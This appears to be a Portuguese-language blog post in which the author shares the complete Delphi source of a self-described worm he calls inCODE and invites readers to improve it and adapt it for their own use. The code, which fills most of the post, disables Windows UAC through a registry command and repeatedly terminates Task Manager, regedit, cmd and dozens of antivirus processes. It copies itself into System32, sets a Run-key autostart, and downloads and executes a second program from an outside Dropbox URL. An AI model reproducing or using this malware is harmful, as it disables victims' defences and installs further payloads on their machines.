Tweet
Durante meus estudos de codigos fontes de worms eu decidi criar um worm/rootkits em delphi. Não fiz em Assembly porque eu não programar o mesmo ainda, porém, eu estou tentando aprender com pesquisas e analises proprias. Esse codigo que vou por a seguir nao coloquei nenhum comentarios por fica bem evidente o que ele faz. Eu ainda não terminei ele, ainda falta varios pontos principalmente o ponto de ser detectavel por antivirus por esta em Delphi. Ele por enquanto apenas finaliza uma serie de processos de antivirus e baixa um outro worm da sua escolha para o computador da vitima, salva no disco "C:\" com o nome de "inCODE.exe", executa e se coloca em autorun no sistema, eu sei que o codigo existe grandes falhas como o "if" no timer, mas estou divulgando caso alguem se interesse e venha a modificar para uso proprio, porém, ja aviso que Não Me responsabilizo por qualquer, dano ou mal que venham fazer desse software
Segue o codigo:
Obs: Quem puder postar uma versão melhorada desta tão vai ajudar não só a mim mas tambem a todos. O codigo esta um pouco precario pois ando sem tempo para conserta e bolar ideias.
Quem quiser copiar, pode copiar desde que coloque os creditos.
Segue o codigo:
Código:
unit inCODE;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, Registry, tlhelp32, ExtCtrls,Urlmon, IdBaseComponent, IdComponent,
IdTCPConnection, IdTCPClient, IdHTTP;
type
TForm1 = class(TForm)
Timer1: TTimer;
IdHTTP1: TIdHTTP;
procedure FormCreate(Sender: TObject);
procedure Timer1Timer(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
implementation
{$R *.dfm}
// Desenvolvido por Jefinho
// http://www.desvendandomalware.blogspot.com.br/
function DownloadFile(Source, Dest: string): Boolean;
begin
try
Result:= UrlDownloadToFile(nil, PChar(source),PChar(Dest), 0, nil) = 0;
except
Result:= False;
end;
end;
procedure RunOnStartup(sProgTitle,sCmdLine: string; bRunOnce: boolean );
var
sKey : string;
reg : TRegIniFile;
begin
if( bRunOnce )then
begin
sKey := 'Once'
end
else
begin
sKey := '';
end;
reg := TRegIniFile.Create( '' );
reg.RootKey := HKEY_LOCAL_MACHINE;
reg.WriteString('Software\Microsoft' + '\Windows\CurrentVersion\Run'+ sKey + #0, sProgTitle, sCmdLine );
reg.Free;
end;
function KillTask(ExeFileName: string): Integer;
const
PROCESS_TERMINATE = $0001;
var
ContinueLoop: BOOL;
FSnapshotHandle: THandle;
FProcessEntry32: TProcessEntry32;
begin
Result := 0;
FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
FProcessEntry32.dwSize := SizeOf(FProcessEntry32);
ContinueLoop := Process32First(FSnapshotHandle, FProcessEntry32);
while Integer(ContinueLoop) <> 0 do
begin
if ((UpperCase(ExtractFileName(FProcessEntry32.szExeFile)) = UpperCase(ExeFileName)) or
(UpperCase(FProcessEntry32.szExeFile) = UpperCase(ExeFileName))) then
Result := Integer(TerminateProcess(OpenProcess(PROCESS_TERMINATE, BOOL(0),
FProcessEntry32.th32ProcessID), 0));
ContinueLoop := Process32Next(FSnapshotHandle, FProcessEntry32);
end;
CloseHandle(FSnapshotHandle);
end;
procedure TForm1.Timer1Timer(Sender: TObject);
begin
WinExec('C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f',SW_shownormal);
KillTask('taskmgr.exe');
KillTask('msconfig.exe');
KillTask('regedit.exe');
KillTask('RegCleaner.exe');
KillTask('cmd.exe');
KillTask('mmc.exe');
KillTask('gepedit.msc');
KillTask('avgcc.exe');
KillTask('avgcc.exe');
KillTask('avgamsvr.exe');
KillTask('avgupsvc.exe');
KillTask('avgw.exe');
KillTask('avgcc32.exe');
KillTask('avgctrl.exe');
KillTask('avgserv.exe');
KillTask('avgserv9.exe');
KillTask('avgserv9schedapp.exe');
KillTask('avgw.exe');
KillTask('avgemc.exe');
KillTask('ashwebsv.exe');
KillTask('ashdisp.exe');
KillTask('ashmaisv.exe');
KillTask('ashserv.exe');
KillTask('aswUpdSv.exe');
KillTask('ashwebsv.exe');
KillTask('nod32krn.exe');
KillTask('nod32kui.exe');
KillTask('avcenter.exe');
KillTask('avcmd.exe');
KillTask('avconfig.exe');
KillTask('avguard.exe');
KillTask('avgnt.exe');
KillTask('avnotify.exe');
KillTask('avscan.exe');
KillTask('guardgui.exe');
KillTask('licmgr.exe');
KillTask('sched.exe');
KillTask('preupd.exe');
KillTask('clamscan.exe');
KillTask('clamTray.exe');
KillTask('clamWin.exe');
KillTask('freshclam.exe');
KillTask('oladdin.exe');
KillTask('sigtool.exe');
KillTask('w9xpopen.exe');
KillTask('Wclose.exe');
KillTask('cmgrdian.exe');
KillTask('alogserv.exe');
KillTask('mcshield.exe');
KillTask('vshwin32.exe');
KillTask('avconsol.exe');
KillTask('vsstat.exe');
KillTask('avsynmgr.exe');
KillTask('avadmin.exe');
KillTask('avcenter.exe');
KillTask('avgnt.exe');
KillTask('avguard.exe');
KillTask('avnotify.exe');
KillTask('avscan.exe');
KillTask('guardgui.exe');
end;
procedure TForm1.FormCreate(Sender: TObject);
begin
WinExec('C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f',SW_shownormal);
KillTask('taskmgr.exe');
KillTask('msconfig.exe');
KillTask('regedit.exe');
KillTask('RegCleaner.exe');
KillTask('cmd.exe');
KillTask('mmc.exe');
KillTask('gepedit.msc');
KillTask('avgcc.exe');
KillTask('avgcc.exe');
KillTask('avgamsvr.exe');
KillTask('avgupsvc.exe');
KillTask('avgw.exe');
KillTask('avgcc32.exe');
KillTask('avgctrl.exe');
KillTask('avgserv.exe');
KillTask('avgserv9.exe');
KillTask('avgserv9schedapp.exe');
KillTask('avgw.exe');
KillTask('avgemc.exe');
KillTask('ashwebsv.exe');
KillTask('ashdisp.exe');
KillTask('ashmaisv.exe');
KillTask('ashserv.exe');
KillTask('aswUpdSv.exe');
KillTask('ashwebsv.exe');
KillTask('nod32krn.exe');
KillTask('nod32kui.exe');
KillTask('avcenter.exe');
KillTask('avcmd.exe');
KillTask('avconfig.exe');
KillTask('avguard.exe');
KillTask('avgnt.exe');
KillTask('avnotify.exe');
KillTask('avscan.exe');
KillTask('guardgui.exe');
KillTask('licmgr.exe');
KillTask('sched.exe');
KillTask('preupd.exe');
KillTask('clamscan.exe');
KillTask('clamTray.exe');
KillTask('clamWin.exe');
KillTask('freshclam.exe');
KillTask('oladdin.exe');
KillTask('sigtool.exe');
KillTask('w9xpopen.exe');
KillTask('Wclose.exe');
KillTask('cmgrdian.exe');
KillTask('alogserv.exe');
KillTask('mcshield.exe');
KillTask('vshwin32.exe');
KillTask('avconsol.exe');
KillTask('vsstat.exe');
KillTask('avsynmgr.exe');
KillTask('avadmin.exe');
KillTask('avcenter.exe');
KillTask('avgnt.exe');
KillTask('avguard.exe');
KillTask('avnotify.exe');
KillTask('avscan.exe');
KillTask('guardgui.exe');
CopyFile(PChar(Application.ExeName),'C:\WINDOWS\System32\inCODE.exe',True);
RunOnStartup('inCODE','C:\WINDOWS\System32\inCODE.exe',true);
if DownloadFile ('http://dl.dropbox.com/u/75831264/Install.exe','C:\inCODE.exe') then
begin
winexec('c:\inCODE.exe',sw_normal);
end;
WinExec('C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f',SW_shownormal);
end;
end.
Quem quiser copiar, pode copiar desde que coloque os creditos.